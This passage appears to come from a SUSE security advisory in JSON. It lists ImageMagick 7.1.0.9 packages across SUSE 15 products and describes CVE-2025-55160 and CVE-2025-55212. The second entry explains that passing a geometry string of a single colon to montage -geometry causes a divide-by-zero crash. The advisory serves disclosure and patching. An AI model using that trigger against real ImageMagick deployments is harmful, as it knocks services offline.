"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-10T18:04:37Z",
"details": "moderate"
}
],
"title": "CVE-2025-55160"
},
{
"cve": "CVE-2025-55212",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-55212"
}
],
"notes": [
{
"category": "general",
"text": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-28 and 7.1.2-2, passing a geometry string containing only a colon (\":\") to montage -geometry leads GetGeometry() to set width/height to 0. Later, ThumbnailImage() divides by these zero dimensions, triggering a crash (SIGFPE/abort), resulting in a denial of service. This issue has been patched in versions 6.9.13-28 and 7.1.2-2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
